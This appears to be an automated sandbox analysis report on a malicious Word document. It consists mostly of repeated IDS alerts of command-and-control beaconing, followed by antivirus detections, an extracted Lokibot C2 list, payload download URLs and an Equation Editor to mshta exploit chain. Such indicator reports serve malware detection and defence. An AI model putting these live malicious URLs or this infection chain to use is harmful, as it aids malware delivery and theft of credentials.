                2024-11-20T11:09:30.598870+010020243181Malware Command and Control Activity Detected192.168.2.224923994.156.177.4180TCP
                2024-11-20T11:09:31.681516+010020243181Malware Command and Control Activity Detected192.168.2.224924094.156.177.4180TCP
                2024-11-20T11:09:32.557261+010020243181Malware Command and Control Activity Detected192.168.2.224924194.156.177.4180TCP
                2024-11-20T11:09:33.605446+010020243181Malware Command and Control Activity Detected192.168.2.224924294.156.177.4180TCP
                2024-11-20T11:09:34.675390+010020243181Malware Command and Control Activity Detected192.168.2.224924394.156.177.4180TCP
                2024-11-20T11:09:35.668171+010020243181Malware Command and Control Activity Detected192.168.2.224924494.156.177.4180TCP
                2024-11-20T11:09:36.753021+010020243181Malware Command and Control Activity Detected192.168.2.224924594.156.177.4180TCP
                2024-11-20T11:09:37.666072+010020243181Malware Command and Control Activity Detected192.168.2.224924694.156.177.4180TCP
                2024-11-20T11:09:38.569971+010020243181Malware Command and Control Activity Detected192.168.2.224924794.156.177.4180TCP
                2024-11-20T11:09:39.499696+010020243181Malware Command and Control Activity Detected192.168.2.224924894.156.177.4180TCP
                2024-11-20T11:09:40.469131+010020243181Malware Command and Control Activity Detected192.168.2.224924994.156.177.4180TCP
                2024-11-20T11:09:41.391468+010020243181Malware Command and Control Activity Detected192.168.2.224925094.156.177.4180TCP
                2024-11-20T11:09:42.303354+010020243181Malware Command and Control Activity Detected192.168.2.224925194.156.177.4180TCP
                2024-11-20T11:09:43.481518+010020243181Malware Command and Control Activity Detected192.168.2.224925294.156.177.4180TCP
                2024-11-20T11:09:44.496461+010020243181Malware Command and Control Activity Detected192.168.2.224925394.156.177.4180TCP
                2024-11-20T11:09:45.552873+010020243181Malware Command and Control Activity Detected192.168.2.224925494.156.177.4180TCP
                2024-11-20T11:09:46.836511+010020243181Malware Command and Control Activity Detected192.168.2.224925594.156.177.4180TCP
                2024-11-20T11:09:47.805329+010020243181Malware Command and Control Activity Detected192.168.2.224925694.156.177.4180TCP
                2024-11-20T11:09:48.830988+010020243181Malware Command and Control Activity Detected192.168.2.224925794.156.177.4180TCP
                2024-11-20T11:09:49.845370+010020243181Malware Command and Control Activity Detected192.168.2.224925894.156.177.4180TCP
                2024-11-20T11:09:50.739485+010020243181Malware Command and Control Activity Detected192.168.2.224925994.156.177.4180TCP
                2024-11-20T11:09:51.764421+010020243181Malware Command and Control Activity Detected192.168.2.224926094.156.177.4180TCP
                2024-11-20T11:09:52.644424+010020243181Malware Command and Control Activity Detected192.168.2.224926194.156.177.4180TCP
                2024-11-20T11:09:54.860925+010020243181Malware Command and Control Activity Detected192.168.2.224926294.156.177.4180TCP
                2024-11-20T11:09:56.162434+010020243181Malware Command and Control Activity Detected192.168.2.224926394.156.177.4180TCP
                2024-11-20T11:09:57.285140+010020243181Malware Command and Control Activity Detected192.168.2.224926494.156.177.4180TCP
                2024-11-20T11:09:58.170473+010020243181Malware Command and Control Activity Detected192.168.2.224926594.156.177.4180TCP
                2024-11-20T11:09:59.122658+010020243181Malware Command and Control Activity Detected192.168.2.224926694.156.177.4180TCP
                2024-11-20T11:10:00.411828+010020243181Malware Command and Control Activity Detected192.168.2.224926794.156.177.4180TCP
                2024-11-20T11:10:01.322717+010020243181Malware Command and Control Activity Detected192.168.2.224926894.156.177.4180TCP
                2024-11-20T11:10:02.202639+010020243181Malware Command and Control Activity Detected192.168.2.224926994.156.177.4180TCP
                2024-11-20T11:10:03.219949+010020243181Malware Command and Control Activity Detected192.168.2.224927094.156.177.4180TCP
                2024-11-20T11:10:04.454187+010020243181Malware Command and Control Activity Detected192.168.2.224927194.156.177.4180TCP
                2024-11-20T11:10:05.503902+010020243181Malware Command and Control Activity Detected192.168.2.224927294.156.177.4180TCP
                2024-11-20T11:10:06.403992+010020243181Malware Command and Control Activity Detected192.168.2.224927394.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T11:08:17.124071+010020216411A Network Trojan was detected192.168.2.224916594.156.177.4180TCP
                2024-11-20T11:08:17.934139+010020216411A Network Trojan was detected192.168.2.224916694.156.177.4180TCP
                2024-11-20T11:08:18.846126+010020216411A Network Trojan was detected192.168.2.224916794.156.177.4180TCP
                2024-11-20T11:08:19.737168+010020216411A Network Trojan was detected192.168.2.224916894.156.177.4180TCP
                2024-11-20T11:08:20.648933+010020216411A Network Trojan was detected192.168.2.224916994.156.177.4180TCP
                2024-11-20T11:08:21.561435+010020216411A Network Trojan was detected192.168.2.224917094.156.177.4180TCP
                2024-11-20T11:08:22.587777+010020216411A Network Trojan was detected192.168.2.224917194.156.177.4180TCP
                2024-11-20T11:08:23.789922+010020216411A Network Trojan was detected192.168.2.224917294.156.177.4180TCP
                2024-11-20T11:08:24.629607+010020216411A Network Trojan was detected192.168.2.224917394.156.177.4180TCP
                2024-11-20T11:08:25.550254+010020216411A Network Trojan was detected192.168.2.224917494.156.177.4180TCP
                2024-11-20T11:08:26.451548+010020216411A Network Trojan was detected192.168.2.224917594.156.177.4180TCP
                2024-11-20T11:08:27.342170+010020216411A Network Trojan was detected192.168.2.224917694.156.177.4180TCP
                2024-11-20T11:08:28.290956+010020216411A Network Trojan was detected192.168.2.224917794.156.177.4180TCP
                2024-11-20T11:08:29.162280+010020216411A Network Trojan was detected192.168.2.224917894.156.177.4180TCP
                2024-11-20T11:08:30.056656+010020216411A Network Trojan was detected192.168.2.224917994.156.177.4180TCP
                2024-11-20T11:08:30.942889+010020216411A Network Trojan was detected192.168.2.224918094.156.177.4180TCP
                2024-11-20T11:08:31.861944+010020216411A Network Trojan was detected192.168.2.224918194.156.177.4180TCP
                2024-11-20T11:08:32.814812+010020216411A Network Trojan was detected192.168.2.224918294.156.177.4180TCP
                2024-11-20T11:08:33.725738+010020216411A Network Trojan was detected192.168.2.224918394.156.177.4180TCP
                2024-11-20T11:08:34.631910+010020216411A Network Trojan was detected192.168.2.224918494.156.177.4180TCP
                2024-11-20T11:08:35.612589+010020216411A Network Trojan was detected192.168.2.224918594.156.177.4180TCP
                2024-11-20T11:08:36.666299+010020216411A Network Trojan was detected192.168.2.224918694.156.177.4180TCP
                2024-11-20T11:08:37.600393+010020216411A Network Trojan was detected192.168.2.224918794.156.177.4180TCP
                2024-11-20T11:08:38.858062+010020216411A Network Trojan was detected192.168.2.224918894.156.177.4180TCP
                2024-11-20T11:08:39.816478+010020216411A Network Trojan was detected192.168.2.224918994.156.177.4180TCP
                2024-11-20T11:08:40.691052+010020216411A Network Trojan was detected192.168.2.224919094.156.177.4180TCP
                2024-11-20T11:08:41.600005+010020216411A Network Trojan was detected192.168.2.224919194.156.177.4180TCP
                2024-11-20T11:08:42.470301+010020216411A Network Trojan was detected192.168.2.224919294.156.177.4180TCP
                2024-11-20T11:08:43.523104+010020216411A Network Trojan was detected192.168.2.224919394.156.177.4180TCP
                2024-11-20T11:08:44.560565+010020216411A Network Trojan was detected192.168.2.224919494.156.177.4180TCP
                2024-11-20T11:08:45.440851+010020216411A Network Trojan was detected192.168.2.224919594.156.177.4180TCP
                2024-11-20T11:08:46.326513+010020216411A Network Trojan was detected192.168.2.224919694.156.177.4180TCP
                2024-11-20T11:08:47.362901+010020216411A Network Trojan was detected192.168.2.224919794.156.177.4180TCP
                2024-11-20T11:08:48.429055+010020216411A Network Trojan was detected192.168.2.224919894.156.177.4180TCP
                2024-11-20T11:08:49.331075+010020216411A Network Trojan was detected192.168.2.224919994.156.177.4180TCP
                2024-11-20T11:08:50.269289+010020216411A Network Trojan was detected192.168.2.224920094.156.177.4180TCP
                2024-11-20T11:08:51.465535+010020216411A Network Trojan was detected192.168.2.224920194.156.177.4180TCP
                2024-11-20T11:08:52.406148+010020216411A Network Trojan was detected192.168.2.224920294.156.177.4180TCP
                2024-11-20T11:08:53.449322+010020216411A Network Trojan was detected192.168.2.224920394.156.177.4180TCP
                2024-11-20T11:08:54.344079+010020216411A Network Trojan was detected192.168.2.224920494.156.177.4180TCP
                2024-11-20T11:08:55.469398+010020216411A Network Trojan was detected192.168.2.224920594.156.177.4180TCP
                2024-11-20T11:08:56.364430+010020216411A Network Trojan was detected192.168.2.224920694.156.177.4180TCP
                2024-11-20T11:08:57.229777+010020216411A Network Trojan was detected192.168.2.224920794.156.177.4180TCP
                2024-11-20T11:08:58.136926+010020216411A Network Trojan was detected192.168.2.224920894.156.177.4180TCP
                2024-11-20T11:08:59.170582+010020216411A Network Trojan was detected192.168.2.224920994.156.177.4180TCP
                2024-11-20T11:09:00.196735+010020216411A Network Trojan was detected192.168.2.224921094.156.177.4180TCP
                2024-11-20T11:09:01.097365+010020216411A Network Trojan was detected192.168.2.224921194.156.177.4180TCP
                2024-11-20T11:09:01.972570+010020216411A Network Trojan was detected192.168.2.224921294.156.177.4180TCP
                2024-11-20T11:09:02.864900+010020216411A Network Trojan was detected192.168.2.224921394.156.177.4180TCP
                2024-11-20T11:09:03.749038+010020216411A Network Trojan was detected192.168.2.224921494.156.177.4180TCP
                2024-11-20T11:09:04.621438+010020216411A Network Trojan was detected192.168.2.224921594.156.177.4180TCP
                2024-11-20T11:09:05.555632+010020216411A Network Trojan was detected192.168.2.224921694.156.177.4180TCP
                2024-11-20T11:09:06.505715+010020216411A Network Trojan was detected192.168.2.224921794.156.177.4180TCP
                2024-11-20T11:09:07.388227+010020216411A Network Trojan was detected192.168.2.224921894.156.177.4180TCP
                2024-11-20T11:09:08.631914+010020216411A Network Trojan was detected192.168.2.224921994.156.177.4180TCP
                2024-11-20T11:09:09.510263+010020216411A Network Trojan was detected192.168.2.224922094.156.177.4180TCP
                2024-11-20T11:09:10.381526+010020216411A Network Trojan was detected192.168.2.224922194.156.177.4180TCP
                2024-11-20T11:09:11.269627+010020216411A Network Trojan was detected192.168.2.224922294.156.177.4180TCP
                2024-11-20T11:09:12.154909+010020216411A Network Trojan was detected192.168.2.224922394.156.177.4180TCP
                2024-11-20T11:09:13.118072+010020216411A Network Trojan was detected192.168.2.224922494.156.177.4180TCP
                2024-11-20T11:09:14.021635+010020216411A Network Trojan was detected192.168.2.224922594.156.177.4180TCP
                2024-11-20T11:09:15.054347+010020216411A Network Trojan was detected192.168.2.224922694.156.177.4180TCP
                2024-11-20T11:09:15.957636+010020216411A Network Trojan was detected192.168.2.224922794.156.177.4180TCP
                2024-11-20T11:09:16.974548+010020216411A Network Trojan was detected192.168.2.224922894.156.177.4180TCP
                2024-11-20T11:09:17.855870+010020216411A Network Trojan was detected192.168.2.224922994.156.177.4180TCP
                2024-11-20T11:09:19.681406+010020216411A Network Trojan was detected192.168.2.224923094.156.177.4180TCP
                2024-11-20T11:09:20.573695+010020216411A Network Trojan was detected192.168.2.224923194.156.177.4180TCP
                2024-11-20T11:09:21.471180+010020216411A Network Trojan was detected192.168.2.224923294.156.177.4180TCP
                2024-11-20T11:09:22.364648+010020216411A Network Trojan was detected192.168.2.224923394.156.177.4180TCP
                2024-11-20T11:09:23.410559+010020216411A Network Trojan was detected192.168.2.224923494.156.177.4180TCP
                2024-11-20T11:09:24.567819+010020216411A Network Trojan was detected192.168.2.224923594.156.177.4180TCP
                2024-11-20T11:09:26.583371+010020216411A Network Trojan was detected192.168.2.224923694.156.177.4180TCP
                2024-11-20T11:09:27.798263+010020216411A Network Trojan was detected192.168.2.224923794.156.177.4180TCP
                2024-11-20T11:09:28.872433+010020216411A Network Trojan was detected192.168.2.224923894.156.177.4180TCP
                2024-11-20T11:09:29.853943+010020216411A Network Trojan was detected192.168.2.224923994.156.177.4180TCP
                2024-11-20T11:09:30.933082+010020216411A Network Trojan was detected192.168.2.224924094.156.177.4180TCP
                2024-11-20T11:09:31.828472+010020216411A Network Trojan was detected192.168.2.224924194.156.177.4180TCP
                2024-11-20T11:09:32.713977+010020216411A Network Trojan was detected192.168.2.224924294.156.177.4180TCP
                2024-11-20T11:09:33.926911+010020216411A Network Trojan was detected192.168.2.224924394.156.177.4180TCP
                2024-11-20T11:09:34.827985+010020216411A Network Trojan was detected192.168.2.224924494.156.177.4180TCP
                2024-11-20T11:09:35.811112+010020216411A Network Trojan was detected192.168.2.224924594.156.177.4180TCP
                2024-11-20T11:09:36.907516+010020216411A Network Trojan was detected192.168.2.224924694.156.177.4180TCP
                2024-11-20T11:09:37.827332+010020216411A Network Trojan was detected192.168.2.224924794.156.177.4180TCP
                2024-11-20T11:09:38.717822+010020216411A Network Trojan was detected192.168.2.224924894.156.177.4180TCP
                2024-11-20T11:09:39.652336+010020216411A Network Trojan was detected192.168.2.224924994.156.177.4180TCP
                2024-11-20T11:09:40.609403+010020216411A Network Trojan was detected192.168.2.224925094.156.177.4180TCP
                2024-11-20T11:09:41.549340+010020216411A Network Trojan was detected192.168.2.224925194.156.177.4180TCP
                2024-11-20T11:09:42.611715+010020216411A Network Trojan was detected192.168.2.224925294.156.177.4180TCP
                2024-11-20T11:09:43.638686+010020216411A Network Trojan was detected192.168.2.224925394.156.177.4180TCP
                2024-11-20T11:09:44.672058+010020216411A Network Trojan was detected192.168.2.224925494.156.177.4180TCP
                2024-11-20T11:09:45.977790+010020216411A Network Trojan was detected192.168.2.224925594.156.177.4180TCP
                2024-11-20T11:09:47.076413+010020216411A Network Trojan was detected192.168.2.224925694.156.177.4180TCP
                2024-11-20T11:09:48.084264+010020216411A Network Trojan was detected192.168.2.224925794.156.177.4180TCP
                2024-11-20T11:09:48.976620+010020216411A Network Trojan was detected192.168.2.224925894.156.177.4180TCP
                2024-11-20T11:09:49.991081+010020216411A Network Trojan was detected192.168.2.224925994.156.177.4180TCP
                2024-11-20T11:09:50.896158+010020216411A Network Trojan was detected192.168.2.224926094.156.177.4180TCP
                2024-11-20T11:09:51.906530+010020216411A Network Trojan was detected192.168.2.224926194.156.177.4180TCP
                2024-11-20T11:09:53.992288+010020216411A Network Trojan was detected192.168.2.224926294.156.177.4180TCP
                2024-11-20T11:09:55.237642+010020216411A Network Trojan was detected192.168.2.224926394.156.177.4180TCP
                2024-11-20T11:09:56.312045+010020216411A Network Trojan was detected192.168.2.224926494.156.177.4180TCP
                2024-11-20T11:09:57.430146+010020216411A Network Trojan was detected192.168.2.224926594.156.177.4180TCP
                2024-11-20T11:09:58.398091+010020216411A Network Trojan was detected192.168.2.224926694.156.177.4180TCP
                2024-11-20T11:09:59.662601+010020216411A Network Trojan was detected192.168.2.224926794.156.177.4180TCP
                2024-11-20T11:10:00.565538+010020216411A Network Trojan was detected192.168.2.224926894.156.177.4180TCP
                2024-11-20T11:10:01.472851+010020216411A Network Trojan was detected192.168.2.224926994.156.177.4180TCP
                2024-11-20T11:10:02.341419+010020216411A Network Trojan was detected192.168.2.224927094.156.177.4180TCP
                2024-11-20T11:10:03.579344+010020216411A Network Trojan was detected192.168.2.224927194.156.177.4180TCP
                2024-11-20T11:10:04.613405+010020216411A Network Trojan was detected192.168.2.224927294.156.177.4180TCP
                2024-11-20T11:10:05.653629+010020216411A Network Trojan was detected192.168.2.224927394.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T11:08:17.124071+010028257661Malware Command and Control Activity Detected192.168.2.224916594.156.177.4180TCP
                2024-11-20T11:08:17.934139+010028257661Malware Command and Control Activity Detected192.168.2.224916694.156.177.4180TCP
                2024-11-20T11:08:18.846126+010028257661Malware Command and Control Activity Detected192.168.2.224916794.156.177.4180TCP
                2024-11-20T11:08:19.737168+010028257661Malware Command and Control Activity Detected192.168.2.224916894.156.177.4180TCP
                2024-11-20T11:08:20.648933+010028257661Malware Command and Control Activity Detected192.168.2.224916994.156.177.4180TCP
                2024-11-20T11:08:21.561435+010028257661Malware Command and Control Activity Detected192.168.2.224917094.156.177.4180TCP
                2024-11-20T11:08:22.587777+010028257661Malware Command and Control Activity Detected192.168.2.224917194.156.177.4180TCP
                2024-11-20T11:08:23.789922+010028257661Malware Command and Control Activity Detected192.168.2.224917294.156.177.4180TCP
                2024-11-20T11:08:24.629607+010028257661Malware Command and Control Activity Detected192.168.2.224917394.156.177.4180TCP
                2024-11-20T11:08:25.550254+010028257661Malware Command and Control Activity Detected192.168.2.224917494.156.177.4180TCP
                2024-11-20T11:08:26.451548+010028257661Malware Command and Control Activity Detected192.168.2.224917594.156.177.4180TCP
                2024-11-20T11:08:27.342170+010028257661Malware Command and Control Activity Detected192.168.2.224917694.156.177.4180TCP
                2024-11-20T11:08:28.290956+010028257661Malware Command and Control Activity Detected192.168.2.224917794.156.177.4180TCP
                2024-11-20T11:08:29.162280+010028257661Malware Command and Control Activity Detected192.168.2.224917894.156.177.4180TCP
                2024-11-20T11:08:30.056656+010028257661Malware Command and Control Activity Detected192.168.2.224917994.156.177.4180TCP
                2024-11-20T11:08:30.942889+010028257661Malware Command and Control Activity Detected192.168.2.224918094.156.177.4180TCP
                2024-11-20T11:08:31.861944+010028257661Malware Command and Control Activity Detected192.168.2.224918194.156.177.4180TCP
                2024-11-20T11:08:32.814812+010028257661Malware Command and Control Activity Detected192.168.2.224918294.156.177.4180TCP
                2024-11-20T11:08:33.725738+010028257661Malware Command and Control Activity Detected192.168.2.224918394.156.177.4180TCP
                2024-11-20T11:08:34.631910+010028257661Malware Command and Control Activity Detected192.168.2.224918494.156.177.4180TCP
                2024-11-20T11:08:35.612589+010028257661Malware Command and Control Activity Detected192.168.2.224918594.156.177.4180TCP
                2024-11-20T11:08:36.666299+010028257661Malware Command and Control Activity Detected192.168.2.224918694.156.177.4180TCP
                2024-11-20T11:08:37.600393+010028257661Malware Command and Control Activity Detected192.168.2.224918794.156.177.4180TCP
                2024-11-20T11:08:38.858062+010028257661Malware Command and Control Activity Detected192.168.2.224918894.156.177.4180TCP
                2024-11-20T11:08:39.816478+010028257661Malware Command and Control Activity Detected192.168.2.224918994.156.177.4180TCP
                2024-11-20T11:08:40.691052+010028257661Malware Command and Control Activity Detected192.168.2.224919094.156.177.4180TCP
                2024-11-20T11:08:41.600005+010028257661Malware Command and Control Activity Detected192.168.2.224919194.156.177.4180TCP
                2024-11-20T11:08:42.470301+010028257661Malware Command and Control Activity Detected192.168.2.224919294.156.177.4180TCP
                2024-11-20T11:08:43.523104+010028257661Malware Command and Control Activity Detected192.168.2.224919394.156.177.4180TCP
                2024-11-20T11:08:44.560565+010028257661Malware Command and Control Activity Detected192.168.2.224919494.156.177.4180TCP
                2024-11-20T11:08:45.440851+010028257661Malware Command and Control Activity Detected192.168.2.224919594.156.177.4180TCP
                2024-11-20T11:08:46.326513+010028257661Malware Command and Control Activity Detected192.168.2.224919694.156.177.4180TCP
                2024-11-20T11:08:47.362901+010028257661Malware Command and Control Activity Detected192.168.2.224919794.156.177.4180TCP
                2024-11-20T11:08:48.429055+010028257661Malware Command and Control Activity Detected192.168.2.224919894.156.177.4180TCP
                2024-11-20T11:08:49.331075+010028257661Malware Command and Control Activity Detected192.168.2.224919994.156.177.4180TCP
                2024-11-20T11:08:50.269289+010028257661Malware Command and Control Activity Detected192.168.2.224920094.156.177.4180TCP
                2024-11-20T11:08:51.465535+010028257661Malware Command and Control Activity Detected192.168.2.224920194.156.177.4180TCP
                2024-11-20T11:08:52.406148+010028257661Malware Command and Control Activity Detected192.168.2.224920294.156.177.4180TCP
                2024-11-20T11:08:53.449322+010028257661Malware Command and Control Activity Detected192.168.2.224920394.156.177.4180TCP
                2024-11-20T11:08:54.344079+010028257661Malware Command and Control Activity Detected192.168.2.224920494.156.177.4180TCP
                2024-11-20T11:08:55.469398+010028257661Malware Command and Control Activity Detected192.168.2.224920594.156.177.4180TCP
                2024-11-20T11:08:56.364430+010028257661Malware Command and Control Activity Detected192.168.2.224920694.156.177.4180TCP
                2024-11-20T11:08:57.229777+010028257661Malware Command and Control Activity Detected192.168.2.224920794.156.177.4180TCP
                2024-11-20T11:08:58.136926+010028257661Malware Command and Control Activity Detected192.168.2.224920894.156.177.4180TCP
                2024-11-20T11:08:59.170582+010028257661Malware Command and Control Activity Detected192.168.2.224920994.156.177.4180TCP
                2024-11-20T11:09:00.196735+010028257661Malware Command and Control Activity Detected192.168.2.224921094.156.177.4180TCP
                2024-11-20T11:09:01.097365+010028257661Malware Command and Control Activity Detected192.168.2.224921194.156.177.4180TCP
                2024-11-20T11:09:01.972570+010028257661Malware Command and Control Activity Detected192.168.2.224921294.156.177.4180TCP
                2024-11-20T11:09:02.864900+010028257661Malware Command and Control Activity Detected192.168.2.224921394.156.177.4180TCP
                2024-11-20T11:09:03.749038+010028257661Malware Command and Control Activity Detected192.168.2.224921494.156.177.4180TCP
                2024-11-20T11:09:04.621438+010028257661Malware Command and Control Activity Detected192.168.2.224921594.156.177.4180TCP
                2024-11-20T11:09:05.555632+010028257661Malware Command and Control Activity Detected192.168.2.224921694.156.177.4180TCP
                2024-11-20T11:09:06.505715+010028257661Malware Command and Control Activity Detected192.168.2.224921794.156.177.4180TCP
                2024-11-20T11:09:07.388227+010028257661Malware Command and Control Activity Detected192.168.2.224921894.156.177.4180TCP
                2024-11-20T11:09:08.631914+010028257661Malware Command and Control Activity Detected192.168.2.224921994.156.177.4180TCP
                2024-11-20T11:09:09.510263+010028257661Malware Command and Control Activity Detected192.168.2.224922094.156.177.4180TCP
                2024-11-20T11:09:10.381526+010028257661Malware Command and Control Activity Detected192.168.2.224922194.156.177.4180TCP
                2024-11-20T11:09:11.269627+010028257661Malware Command and Control Activity Detected192.168.2.224922294.156.177.4180TCP
                2024-11-20T11:09:12.154909+010028257661Malware Command and Control Activity Detected192.168.2.224922394.156.177.4180TCP
                2024-11-20T11:09:13.118072+010028257661Malware Command and Control Activity Detected192.168.2.224922494.156.177.4180TCP
                2024-11-20T11:09:14.021635+010028257661Malware Command and Control Activity Detected192.168.2.224922594.156.177.4180TCP
                2024-11-20T11:09:15.054347+010028257661Malware Command and Control Activity Detected192.168.2.224922694.156.177.4180TCP
                2024-11-20T11:09:15.957636+010028257661Malware Command and Control Activity Detected192.168.2.224922794.156.177.4180TCP
                2024-11-20T11:09:16.974548+010028257661Malware Command and Control Activity Detected192.168.2.224922894.156.177.4180TCP
                2024-11-20T11:09:17.855870+010028257661Malware Command and Control Activity Detected192.168.2.224922994.156.177.4180TCP
                2024-11-20T11:09:19.681406+010028257661Malware Command and Control Activity Detected192.168.2.224923094.156.177.4180TCP
                2024-11-20T11:09:20.573695+010028257661Malware Command and Control Activity Detected192.168.2.224923194.156.177.4180TCP
                2024-11-20T11:09:21.471180+010028257661Malware Command and Control Activity Detected192.168.2.224923294.156.177.4180TCP
                2024-11-20T11:09:22.364648+010028257661Malware Command and Control Activity Detected192.168.2.224923394.156.177.4180TCP
                2024-11-20T11:09:23.410559+010028257661Malware Command and Control Activity Detected192.168.2.224923494.156.177.4180TCP
                2024-11-20T11:09:24.567819+010028257661Malware Command and Control Activity Detected192.168.2.224923594.156.177.4180TCP
                2024-11-20T11:09:26.583371+010028257661Malware Command and Control Activity Detected192.168.2.224923694.156.177.4180TCP
                2024-11-20T11:09:27.798263+010028257661Malware Command and Control Activity Detected192.168.2.224923794.156.177.4180TCP
                2024-11-20T11:09:28.872433+010028257661Malware Command and Control Activity Detected192.168.2.224923894.156.177.4180TCP
                2024-11-20T11:09:29.853943+010028257661Malware Command and Control Activity Detected192.168.2.224923994.156.177.4180TCP
                2024-11-20T11:09:30.933082+010028257661Malware Command and Control Activity Detected192.168.2.224924094.156.177.4180TCP
                2024-11-20T11:09:31.828472+010028257661Malware Command and Control Activity Detected192.168.2.224924194.156.177.4180TCP
                2024-11-20T11:09:32.713977+010028257661Malware Command and Control Activity Detected192.168.2.224924294.156.177.4180TCP
                2024-11-20T11:09:33.926911+010028257661Malware Command and Control Activity Detected192.168.2.224924394.156.177.4180TCP
                2024-11-20T11:09:34.827985+010028257661Malware Command and Control Activity Detected192.168.2.224924494.156.177.4180TCP
                2024-11-20T11:09:35.811112+010028257661Malware Command and Control Activity Detected192.168.2.224924594.156.177.4180TCP
                2024-11-20T11:09:36.907516+010028257661Malware Command and Control Activity Detected192.168.2.224924694.156.177.4180TCP
                2024-11-20T11:09:37.827332+010028257661Malware Command and Control Activity Detected192.168.2.224924794.156.177.4180TCP
                2024-11-20T11:09:38.717822+010028257661Malware Command and Control Activity Detected192.168.2.224924894.156.177.4180TCP
                2024-11-20T11:09:39.652336+010028257661Malware Command and Control Activity Detected192.168.2.224924994.156.177.4180TCP
                2024-11-20T11:09:40.609403+010028257661Malware Command and Control Activity Detected192.168.2.224925094.156.177.4180TCP
                2024-11-20T11:09:41.549340+010028257661Malware Command and Control Activity Detected192.168.2.224925194.156.177.4180TCP
                2024-11-20T11:09:42.611715+010028257661Malware Command and Control Activity Detected192.168.2.224925294.156.177.4180TCP
                2024-11-20T11:09:43.638686+010028257661Malware Command and Control Activity Detected192.168.2.224925394.156.177.4180TCP
                2024-11-20T11:09:44.672058+010028257661Malware Command and Control Activity Detected192.168.2.224925494.156.177.4180TCP
                2024-11-20T11:09:45.977790+010028257661Malware Command and Control Activity Detected192.168.2.224925594.156.177.4180TCP
                2024-11-20T11:09:47.076413+010028257661Malware Command and Control Activity Detected192.168.2.224925694.156.177.4180TCP
                2024-11-20T11:09:48.084264+010028257661Malware Command and Control Activity Detected192.168.2.224925794.156.177.4180TCP
                2024-11-20T11:09:48.976620+010028257661Malware Command and Control Activity Detected192.168.2.224925894.156.177.4180TCP
                2024-11-20T11:09:49.991081+010028257661Malware Command and Control Activity Detected192.168.2.224925994.156.177.4180TCP
                2024-11-20T11:09:50.896158+010028257661Malware Command and Control Activity Detected192.168.2.224926094.156.177.4180TCP
                2024-11-20T11:09:51.906530+010028257661Malware Command and Control Activity Detected192.168.2.224926194.156.177.4180TCP
                2024-11-20T11:09:53.992288+010028257661Malware Command and Control Activity Detected192.168.2.224926294.156.177.4180TCP
                2024-11-20T11:09:55.237642+010028257661Malware Command and Control Activity Detected192.168.2.224926394.156.177.4180TCP
                2024-11-20T11:09:56.312045+010028257661Malware Command and Control Activity Detected192.168.2.224926494.156.177.4180TCP
                2024-11-20T11:09:57.430146+010028257661Malware Command and Control Activity Detected192.168.2.224926594.156.177.4180TCP
                2024-11-20T11:09:58.398091+010028257661Malware Command and Control Activity Detected192.168.2.224926694.156.177.4180TCP
                2024-11-20T11:09:59.662601+010028257661Malware Command and Control Activity Detected192.168.2.224926794.156.177.4180TCP
                2024-11-20T11:10:00.565538+010028257661Malware Command and Control Activity Detected192.168.2.224926894.156.177.4180TCP
                2024-11-20T11:10:01.472851+010028257661Malware Command and Control Activity Detected192.168.2.224926994.156.177.4180TCP
                2024-11-20T11:10:02.341419+010028257661Malware Command and Control Activity Detected192.168.2.224927094.156.177.4180TCP
                2024-11-20T11:10:03.579344+010028257661Malware Command and Control Activity Detected192.168.2.224927194.156.177.4180TCP
                2024-11-20T11:10:04.613405+010028257661Malware Command and Control Activity Detected192.168.2.224927294.156.177.4180TCP
                2024-11-20T11:10:05.653629+010028257661Malware Command and Control Activity Detected192.168.2.224927394.156.177.4180TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: stthigns.docAvira: detected
                Source: http://94.156.177.41/maxzi/five/fre.phpAvira URL Cloud: Label: malware
                Source: http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaAvira URL Cloud: Label: malware
                Source: http://66.63.187.231/33/caspol.exeAvira URL Cloud: Label: malware
                Source: 94.156.177.41/maxzi/five/fre.phpAvira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exeAvira: detection malicious, Label: HEUR/AGEN.1306899
                Source: C:\Users\user\AppData\Roaming\wininit.exeAvira: detection malicious, Label: HEUR/AGEN.1306899
                Source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/maxzi/five/fre.php"]}
                Source: stthigns.docReversingLabs: Detection: 50%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\wininit.exeJoe Sandbox ML: detected

                Exploits

                barindex
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 66.63.187.231 Port: 80Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exeJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: p7C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.pdb source: powershell.exe, 00000006.00000002.387368019.0000000002831000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 15_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,15_2_00403D74

                Software Vulnerabilities

                barindex
